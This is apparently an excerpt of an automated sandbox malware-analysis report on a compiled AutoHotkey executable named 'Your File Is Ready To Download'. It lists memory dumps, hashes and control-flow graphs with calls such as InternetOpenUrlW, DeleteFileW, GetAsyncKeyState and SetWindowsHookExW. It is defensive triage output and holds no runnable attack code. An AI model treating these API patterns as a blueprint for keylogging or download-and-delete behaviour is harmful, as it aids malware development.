                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: __doserrno_errno_invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID: U
                                                                                                                                                                                                                          • API String ID: 3902385426-4171548499
                                                                                                                                                                                                                          • Opcode ID: 4d87e5cffc3264a1277eecf34d6c09614b5992ef2590aa09f0e259b57f8be8ff
                                                                                                                                                                                                                          • Instruction ID: a4a8909496ae244fd0422bab7908752e94e038f50cbfb6111306141b6b1c6e67
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d87e5cffc3264a1277eecf34d6c09614b5992ef2590aa09f0e259b57f8be8ff
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3612AD32214A85A6EB228F2AE4443EE67A1FBCCBD4F550116FB49476B5DF3CC546CB20
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _errno$ErrorFileLast$CloseCreateHandle__doserrno_lseek_nolock$_close_nolock_invalid_parameter_noinfo$Type_get_daylight
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2942463501-0
                                                                                                                                                                                                                          • Opcode ID: 4c6e18365acede8c7302dddb8b7ae1e7797c567f1fb070b68564fb7f670049c3
                                                                                                                                                                                                                          • Instruction ID: 2c6486dcb89be7864fd383a5acd438a3a33720cd0ff5882b52efaa60fdd82429
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c6e18365acede8c7302dddb8b7ae1e7797c567f1fb070b68564fb7f670049c3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE32F7327106508AFB66AB3AD4903EC37A1AB4C7E9F544615FF1A977F5DA38C842C720
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 1560 14007d8a0-14007d8cf 1561 14007d8d0-14007d8d7 1560->1561 1562 14007d8df-14007d8e3 1561->1562 1563 14007d8d9-14007d8dd 1561->1563 1562->1561 1563->1562 1564 14007d8e5-14007d8e9 1563->1564 1565 14007d960-14007d985 InternetOpenW 1564->1565 1566 14007d8eb-14007d8fc call 140014440 1564->1566 1567 14007d987-14007d9a8 InternetOpenUrlW 1565->1567 1568 14007d9b3-14007d9bd call 14003ebc0 1565->1568 1576 14007d90e-14007d913 call 1400ca468 1566->1576 1577 14007d8fe-14007d90c call 1400caf60 1566->1577 1570 14007d9da-14007d9f7 call 1400cb6dc 1567->1570 1571 14007d9aa-14007d9ad InternetCloseHandle 1567->1571 1578 14007dc24-14007dc3f 1568->1578 1584 14007da12-14007da52 1570->1584 1585 14007d9f9-14007da0d InternetCloseHandle * 2 1570->1585 1571->1568 1586 14007d915-14007d91b 1576->1586 1577->1586 1588 14007da58-14007da5c 1584->1588 1589 14007db2e-14007db47 InternetReadFileExA 1584->1589 1587 14007dc14-14007dc1c call 14003ebc0 1585->1587 1586->1565 1590 14007d91d-14007d923 1586->1590 1587->1578 1588->1589 1594 14007da62-14007da80 InternetReadFile 1588->1594 1592 14007dbe8-14007dbfd InternetCloseHandle * 2 call 1400cb980 1589->1592 1593 14007db4d 1589->1593 1590->1565 1596 14007d925 1590->1596 1600 14007dc02-14007dc04 1592->1600 1598 14007db50-14007db55 1593->1598 1594->1592 1599 14007da86 1594->1599 1601 14007d930-14007d93c 1596->1601 1598->1592 1602 14007db5b-14007db74 GetTickCount 1598->1602 1603 14007da90-14007da97 1599->1603 1604 14007dc06-14007dc0f DeleteFileW 1600->1604 1605 14007dc11 1600->1605 1606 14007d940-14007d943 1601->1606 1607 14007db76-14007db90 PeekMessageW 1602->1607 1608 14007dbab-14007dbe2 call 1400cb874 InternetReadFileExA 1602->1608 1603->1592 1609 14007da9d-14007dab6 GetTickCount 1603->1609 1604->1605 1605->1587 1611 14007d945-14007d950 1606->1611 1612 14007d9c2 1606->1612 1613 14007db92-14007db9a call 140001ac0 1607->1613 1614 14007db9f-14007dba5 GetTickCount 1607->1614 1608->1592 1608->1598 1615 14007dab8-14007dad2 PeekMessageW 1609->1615 1616 14007daed-14007db23 call 1400cb874 InternetReadFile 1609->1616 1611->1606 1622 14007d952-14007d95e 1611->1622 1620 14007d9c5-14007d9cc 1612->1620 1613->1614 1614->1608 1617 14007dad4-14007dadc call 140001ac0 1615->1617 1618 14007dae1-14007dae7 GetTickCount 1615->1618 1616->1603 1628 14007db29 1616->1628 1617->1618 1618->1616 1625 14007d9d4-14007d9d8 1620->1625 1626 14007d9ce-14007d9d2 1620->1626 1622->1565 1622->1601 1625->1620 1626->1565 1626->1625 1628->1592
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Internet$CloseFileHandle$CountReadTick$MessageOpenPeek$Delete_wcstoi64fclose
                                                                                                                                                                                                                          • String ID: *$8$AutoHotkey
                                                                                                                                                                                                                          • API String ID: 338787218-1845633735
                                                                                                                                                                                                                          • Opcode ID: 50068428ae124f9ac5ba47c5503562940b556728074513cd1489932c66c5ce1e
                                                                                                                                                                                                                          • Instruction ID: 519f27d1ee2668330eb18596164ee0d9a3aa50dba7858ae6fe74fe2368b804bd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 50068428ae124f9ac5ba47c5503562940b556728074513cd1489932c66c5ce1e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 84A19E3620468186FB629B27A8407EA73A1FB8DBD4F544022FF4947AA4EF3CC546C710
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$Windowwcsncpy$Message$ClassCurrentDialogDirectoryDragFinishForegroundNameProcessShowThread
                                                                                                                                                                                                                          • String ID: #32770
                                                                                                                                                                                                                          • API String ID: 1745663375-463685578
                                                                                                                                                                                                                          • Opcode ID: 80a2dc55f99fc7b2c8c3dec6d4e55a734c8bf130994ded284f83efa18fd3f8ed
                                                                                                                                                                                                                          • Instruction ID: 9e7e74af8c7ff7cf0b9e1bc25033d8e592212d80976107e6d7a984fb2758a8d3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 80a2dc55f99fc7b2c8c3dec6d4e55a734c8bf130994ded284f83efa18fd3f8ed
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40227EB2604A948AFB66DF27A8503E937A0F78DBD8F544121EF4A57BB4DB34C981C710
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 1932 14000cf50-14000cf84 PostQuitMessage 1933 14000cf86 1932->1933 1934 14000cf8a-14000cf95 1932->1934 1933->1934 1935 14000d0e6-14000d0f0 1934->1935 1936 14000cf9b-14000cfa0 1934->1936 1938 14000d0f2 UnhookWindowsHookEx 1935->1938 1939 14000d0f8-14000d106 1935->1939 1937 14000cfa3-14000cfbc PostThreadMessageW 1936->1937 1940 14000cfce-14000cfd9 GetTickCount 1937->1940 1941 14000cfbe-14000cfcc Sleep 1937->1941 1938->1939 1942 14000d19b-14000d19d call 1400c953c 1939->1942 1943 14000d10c-14000d11d 1939->1943 1946 14000cfe0-14000cffa GetExitCodeThread 1940->1946 1941->1937 1941->1940 1949 14000d1a2-14000d1a7 1942->1949 1944 14000d120-14000d12e 1943->1944 1947 14000d18d-14000d199 1944->1947 1948 14000d130-14000d134 1944->1948 1950 14000d015-14000d029 CloseHandle call 14000bd80 1946->1950 1951 14000cffc-14000d009 GetTickCount 1946->1951 1947->1942 1947->1944 1952 14000d164-14000d167 1948->1952 1953 14000d136-14000d161 UnregisterHotKey 1948->1953 1955 14000d02e-14000d035 1950->1955 1954 14000d00b-14000d013 Sleep 1951->1954 1951->1955 1952->1947 1957 14000d169-14000d16c 1952->1957 1953->1952 1954->1946 1958 14000d056-14000d059 1955->1958 1959 14000d037-14000d03a 1955->1959 1957->1947 1963 14000d16e-14000d189 1957->1963 1961 14000d06f-14000d076 1958->1961 1962 14000d05b-14000d068 CloseHandle 1958->1962 1960 14000d03c-14000d054 CreateMutexW 1959->1960 1959->1961 1960->1961 1964 14000d098-14000d09c 1961->1964 1965 14000d078-14000d07c 1961->1965 1962->1961 1963->1947 1966 14000d0b2-14000d0ba 1964->1966 1968 14000d09e-14000d0ab CloseHandle 1964->1968 1965->1966 1967 14000d07e-14000d096 CreateMutexW 1965->1967 1966->1935 1969 14000d0bc-14000d0e0 call 1400b2590 1966->1969 1967->1966 1968->1966 1969->1935
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseHandle$CountCreateMessageMutexPostSleepThreadTick$CodeExitHookQuitUnhookUnregisterWindows
                                                                                                                                                                                                                          • String ID: AHK Keybd$AHK Mouse$Warning: The keyboard and/or mouse hook could not be activated; some parts of the script will not function.
                                                                                                                                                                                                                          • API String ID: 880717225-3816831916
                                                                                                                                                                                                                          • Opcode ID: 66f4627063f3ad17ef368d45ad8c0673b99c6e883e1707053218bbed8cdb30f1
                                                                                                                                                                                                                          • Instruction ID: 960eb5f1bdb7a21aa3d66e0857d9c0959fa80708bd9969e64d2a7d304a95ffff
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66f4627063f3ad17ef368d45ad8c0673b99c6e883e1707053218bbed8cdb30f1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5613771215B8486FB1ADB23F8443E973A1BB4CBD4F444426EF4A4B6B4DF39C856C220
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 1972 140016300-14001634a 1973 140016351-140016358 1972->1973 1974 14001634c-14001634f 1972->1974 1975 14001635a-14001635d 1973->1975 1976 14001635f 1973->1976 1974->1973 1974->1975 1977 140016362-140016381 1975->1977 1976->1977 1978 140016641-140016655 1977->1978 1979 140016387-14001638e 1977->1979 1981 1400167c6-1400167d4 1978->1981 1982 14001665b-140016662 1978->1982 1980 140016391-140016398 1979->1980 1983 14001639a-1400163b3 GetTickCount 1980->1983 1984 1400163fb 1980->1984 1985 140016664-14001666b 1982->1985 1986 140016670-140016678 1982->1986 1987 140016402-140016404 1983->1987 1988 1400163b5-1400163d0 PeekMessageW 1983->1988 1984->1987 1989 14001679c-1400167a6 1985->1989 1990 140016686-1400166b1 GetAsyncKeyState * 2 1986->1990 1991 14001667a-140016681 1986->1991 1997 14001640a-140016413 1987->1997 1998 1400165be-1400165c1 1987->1998 1993 1400163d2-1400163e5 call 140001ac0 1988->1993 1994 1400163ef-1400163f5 GetTickCount 1988->1994 1989->1981 1992 1400167a8-1400167c1 call 140019230 1989->1992 1995 1400166b3 1990->1995 1996 1400166b6-1400166c5 GetAsyncKeyState 1990->1996 1991->1989 1992->1981 1993->1994 1994->1984 1995->1996 2003 1400166c7 1996->2003 2004 1400166ca-1400166d9 GetAsyncKeyState 1996->2004 1999 140016421 1997->1999 2000 140016415-14001641f 1997->2000 2005 140016601-140016625 call 140016d90 1998->2005 2006 1400165c3-1400165c6 1998->2006 2008 140016426-14001642d 1999->2008 2000->2008 2003->2004 2009 1400166db 2004->2009 2010 1400166de-1400166ed GetAsyncKeyState 2004->2010 2018 14001662a-14001662d 2005->2018 2006->2005 2007 1400165c8-1400165ff call 140017ff0 2006->2007 2007->2018 2014 14001643b-140016443 2008->2014 2015 14001642f-140016436 2008->2015 2009->2010 2016 1400166f2-140016701 GetAsyncKeyState 2010->2016 2017 1400166ef 2010->2017 2021 140016451-140016484 GetAsyncKeyState * 2 2014->2021 2022 140016445-14001644c 2014->2022 2020 14001658c-1400165b6 call 140019230 2015->2020 2023 140016703 2016->2023 2024 140016706-140016715 GetAsyncKeyState 2016->2024 2017->2016 2018->1980 2025 140016633-14001663b 2018->2025 2020->1998 2026 140016486 2021->2026 2027 140016489-14001649c GetAsyncKeyState 2021->2027 2022->2020 2023->2024 2028 140016717 2024->2028 2029 14001671a-140016729 GetAsyncKeyState 2024->2029 2025->1978 2026->2027 2031 1400164a1-1400164b4 GetAsyncKeyState 2027->2031 2032 14001649e 2027->2032 2028->2029 2033 14001672b 2029->2033 2034 14001672e-140016736 2029->2034 2036 1400164b6 2031->2036 2037 1400164b9-1400164cc GetAsyncKeyState 2031->2037 2032->2031 2033->2034 2034->1989 2038 140016738-140016749 2034->2038 2036->2037 2040 1400164d1-1400164e4 GetAsyncKeyState 2037->2040 2041 1400164ce 2037->2041 2038->1989 2039 14001674b-140016786 call 140019bd0 2038->2039 2039->1989 2050 140016788-140016795 2039->2050 2043 1400164e6 2040->2043 2044 1400164e9-1400164fc GetAsyncKeyState 2040->2044 2041->2040 2043->2044 2045 140016501-140016514 GetAsyncKeyState 2044->2045 2046 1400164fe 2044->2046 2048 140016516 2045->2048 2049 140016519-140016521 2045->2049 2046->2045 2048->2049 2049->2020 2051 140016523-140016533 2049->2051 2050->1989 2052 140016584 2051->2052 2053 140016535-14001656e call 140019bd0 2051->2053 2052->2020 2053->2052 2056 140016570-14001657d 2053->2056 2056->2052
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AsyncState$CountTick$MessagePeek
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 958976530-0
                                                                                                                                                                                                                          • Opcode ID: 536319ceb3123cf7fc4fc61d0007b67be7add25ef469e7976093150661d5fb1f
                                                                                                                                                                                                                          • Instruction ID: 50252e98626dfd7861110ca0e7a23950e54a8093af5b38ea2f991951a7098b72
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 536319ceb3123cf7fc4fc61d0007b67be7add25ef469e7976093150661d5fb1f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53D1C0352046D086F7669B37AC643EA3BA0E74DB95F080119EBC60B6F1DF3E8944DB21
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 2057 140018a20-140018a3f 2058 140018a45-140018a69 2057->2058 2059 140018cdd-140018d08 SetWindowsHookExW 2057->2059 2062 140018a6b 2058->2062 2063 140018a6f-140018a74 2058->2063 2060 140018d0a 2059->2060 2061 140018ccc-140018cdc 2059->2061 2064 140018d10-140018d2f call 140001ac0 2060->2064 2062->2063 2065 140018b63-140018b7f SendInput 2063->2065 2066 140018a7a-140018a9c 2063->2066 2077 140018d31-140018d4a 2064->2077 2068 140018cc4 2065->2068 2069 140018b85-140018b91 2065->2069 2070 140018a9e 2066->2070 2071 140018aa0-140018aa3 2066->2071 2068->2061 2073 140018b93-140018bbf call 140019a80 GetForegroundWindow 2069->2073 2074 140018bc6-140018bdc 2069->2074 2070->2071 2075 140018aa9-140018ab7 2071->2075 2076 140018b5b 2071->2076 2073->2074 2079 140018bde 2074->2079 2080 140018be0-140018be3 2074->2080 2081 140018ac0-140018ad9 PostThreadMessageW 2075->2081 2076->2065 2077->2061 2085 140018d4c-140018d62 2077->2085 2079->2080 2080->2068 2084 140018be9-140018bef 2080->2084 2082 140018aeb-140018afb GetTickCount 2081->2082 2083 140018adb-140018ae9 Sleep 2081->2083 2087 140018b00-140018b03 2082->2087 2083->2081 2083->2082 2088 140018bf0-140018c09 PostThreadMessageW 2084->2088 2089 140018c67-140018c6e call 14000bd50 2087->2089 2090 140018b09-140018b25 PeekMessageW 2087->2090 2091 140018c1b-140018c23 GetTickCount 2088->2091 2092 140018c0b-140018c19 Sleep 2088->2092 2089->2076 2093 140018c74-140018c81 GetTickCount 2089->2093 2090->2093 2094 140018b2b-140018b30 2090->2094 2095 140018c30-140018c4c PeekMessageW 2091->2095 2092->2088 2092->2091 2093->2076 2101 140018c87-140018c8f Sleep 2093->2101 2094->2076 2097 140018b32-140018b55 call 1400b2590 2094->2097 2098 140018c94-140018c99 2095->2098 2099 140018c4e-140018c5b GetTickCount 2095->2099 2097->2076 2098->2068 2104 140018c9b-140018cbe call 1400b2590 2098->2104 2099->2068 2103 140018c5d-140018c65 Sleep 2099->2103 2101->2087 2103->2095 2104->2068
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountMessageSleepTick$PeekPostThread$ForegroundHookInputSendWindowWindows
                                                                                                                                                                                                                          • String ID: Warning: The keyboard and/or mouse hook could not be activated; some parts of the script will not function.
                                                                                                                                                                                                                          • API String ID: 2352124081-3277093602
                                                                                                                                                                                                                          • Opcode ID: 6aabd4b726803a944af17478416a8cc6620bddb3860a86e818d514f216d55405
                                                                                                                                                                                                                          • Instruction ID: cf98827361759fedefda0d8aad51e37a303b0ae38d07b127c86cfdeb9afc4ae9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6aabd4b726803a944af17478416a8cc6620bddb3860a86e818d514f216d55405
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA919171204A8086F7769F23A8907EA77A0FB8DBC4F484129EF464B6B5DF39C945C710
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: KeyboardLayout
                                                                                                                                                                                                                          • String ID: ERROR$Memory limit reached (see #MaxMem in the help file).$Out of memory.$UseErrorLevel
                                                                                                                                                                                                                          • API String ID: 194098044-3549142029
                                                                                                                                                                                                                          • Opcode ID: 76006ca49193b62dc5843b14c139dfc2f9456ae7fd7b78a0f5d15af5032b4cc0
                                                                                                                                                                                                                          • Instruction ID: 978b607b87ad602b9e93bc73c155b4eef44c2ad70320dec673cbcc6f4986eb41
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 76006ca49193b62dc5843b14c139dfc2f9456ae7fd7b78a0f5d15af5032b4cc0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CBA2EE32204A8086EB77CB23D4503EE27A1F74D7D8F564A26EF4A576B5DB38C895C309
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _errno$EnvironmentVariable_callnewh_wcstoi64malloc$AllocateHeap
                                                                                                                                                                                                                          • String ID: $ $Memory limit reached (see #MaxMem in the help file).$Out of memory.
                                                                                                                                                                                                                          • API String ID: 931988796-4280895764
                                                                                                                                                                                                                          • Opcode ID: 151c045207cedb255f36498ad215fe311b2e794eeaf2cff859b1c5edfa864bd6
                                                                                                                                                                                                                          • Instruction ID: 67762a80bb963e0db436d588c4684dc58643369c32fad44c750a4ee843f542b7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 151c045207cedb255f36498ad215fe311b2e794eeaf2cff859b1c5edfa864bd6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6703BA33200B8486EB669F27D484BE827A5FB4CBD4F554616FB5E17BA9DB34CA81C340
                                                                                                                                                                                                                          Uniqueness

